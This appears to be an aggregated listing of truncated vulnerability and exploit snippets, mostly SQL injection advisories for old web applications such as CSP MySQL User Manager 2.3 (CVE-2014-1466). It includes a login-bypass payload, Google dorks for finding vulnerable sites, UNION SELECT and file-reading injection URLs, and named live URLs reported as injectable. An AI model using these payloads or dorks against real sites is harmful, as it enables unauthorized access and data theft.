CSP MySQL User Manager 2.3 SQLi Vulnerability

CSP MySQL User Manager is prone to an SQL injection SQLi vulnerability. SPDX-FileCopyrightText: 2014 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

CVE-2014-1466

SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page...

Sql injection

SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page...

CVE-2014-1466

CVE-2014-1466 affects CSP MySQL User Manager 2.3 and is caused by an SQL injection (SQLi) in the login field of the login page. The vulnerability allows remote attackers to influence SQL commands executed by the application, with impact described as partial confidentiality, partial integrity, and...

CVE-2014-1466

SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page...

CSP MySQL User Manager v2.3 SQL Injection Authentication Bypass

we just need to input admin login like this : admin' or ' 1=1-- and any password :- login : admin' or ' 1=1-- Usage Info we just need to input admin login like this : admin' or ' 1=1-- and any password :- login : admin' or ' 1=1-- we just need to input admin login like this : admin' or ' 1=1-- an...

CSP MySQL User Manager 2.3 SQL Injection

Exploit Title: CSP MySQL User Manager v2.3 SQL Injection Authentication Bypass Google Dork: intitle:"CSP MySQL User Manager" Date: 8/1/2013 Exploit Author: Youssef mami Vendor Homepage: https://code.google.com/p/cspmum/ Software Link:...

53kf.com的SQL严重注入漏洞

简要描述： Mysql用户为Root啊，估计跟前面两位兄弟一样问题，最后，亲还有礼物吗？ 详细说明： sqlinj http://www10.53kf.com/iframebrief.php?styleid=103560295 漏洞证明： 大家都懂的...

cPanel Pro 11.32.5.11 Cross Site Request Forgery

============================================================================== Vulnerable Software: cPanel version : 11.32.5 build 11-11.32.5.11 cPanel Pro Vulnerability: CSRF Vendor: cpanel.net ==============================================================================...

53kf某频道 ROOT注入

简要描述： Mysql用户为Root啊，估计跟前面两位兄弟一样问题，最后，亲还有礼物吗？ 详细说明： 注入url: http://cps1.53kf.com/webpubcpsinfo.php?id=21 漏洞证明： 没有什么好说，看图吧...

Group-Office Calendar 4.0.88 SQL Injection Vulnerability

Exploit for php platform in category web applications /-------------------------------------\ | Group-Office Calendar SQL Injection | -------------------------------------/ Summary ======= Versions of Group-Office a web app for online collaboration prior to 4.0.90 are subject to a SQL injection...

Group-Office Calendar 4.0.88 SQL Injection

/-------------------------------------\ | Group-Office Calendar SQL Injection | -------------------------------------/ Summary ======= Versions of Group-Office a web app for online collaboration prior to 4.0.90 are subject to a SQL injection vulnerability located in the calendar module. A PHP...

SN News 1.2 - 'visualiza.php' SQL Injection

\n"; echo "Example:\n"; echo "php $argv0 http://www.website.com/snnews\n"; exit; $target = $argv1; ifsubstr$target, strlen$target-1!="/" $target .= "/"; $inject = $target . "visualiza.php?id=-0'%20"; $token = uniqid; $tokenhex = hex$token; echo " Trying to get informations...\n"; $infos =...

MangosWeb - SQL Injection

MangosWeb - SQL Injection EXPLOIT TITLE: MangosWeb SQL Vulnerability DATE: 1/7/2012 BY Hood3dRob1n AFFECTED PRODUCTS: MangosWeb Enhanced Version 3.0.3 SW LINK: http://code.google.com/p/mwenhanced/ CATEGORY: WebApp 0day DORK: intext:MangosWeb ENhanced Version 3.0.3 @2009-2011, KeysWow Dev Team...

Maian Weblog 4.0 - Blind SQL Injection

Maian Weblog 4.0 - Blind SQL Injection ?php / maian weblog = v4.0 Remote Blind SQL Injection Exploit vendor: http://www.maianscriptworld.co.uk/ Thanks to Johannes Dahse: http://bit.ly/dpQXMK Explanation: Lines 335 - 341 of the index.php we see this if statement that concerns our variable $bpost. ...

Specialist Bed and Breakfast Website SQL Injection Exploit

Exploit for php platform in category web applications ========================================================== Specialist Bed and Breakfast Website SQL Injection Exploit ========================================================== !/usr/bin/python Specialist Bed and Breakfast Website SQL Injectio...

Joomla JP Jobs SQL Injection

Exploit Title: Joomla component jpjobs SQL Injection vulnerability Date: 03.04.2010 Author: Valentin Category: webapps/0day Version: Tested on: CVE : Code : :: General information :: Joomla component jpjobs SQL Injection vulnerability :: by Valentin Hoebel :: [email protected] :: Product...

PHPhotoalbum 0.5 - SQL Injection

PHPhotoalbum 0.5 - SQL Injection Title: PHPhotoalbum Remote sql injection Vulnerability Tested on: windows http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+user+from+mysql.user-- http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+loadfile/directory...

ActiveBids Blind SQL Injection

ActiveBids default.asp Blind SQL Injection Vulnerability Author : Hussin X Home : www.IQ-TY.com email : [email protected] Vendor : http://www.activewebsoftwares.com Demo : http://server/default.asp?catid=39+and+1=1 true http://server/default.asp?catid=39+and+1=0 false :: test ::...

wbstreet 1.0 - SQL Injection File Disclosure

wbstreet 1.0 - SQL Injection File Disclosure =================================================================== Wbstreet v.1.0 show.php id Remote SQL Injection Vulnerability =================================================================== ,--^----------,--------,-----,-------^--, | |||||||||...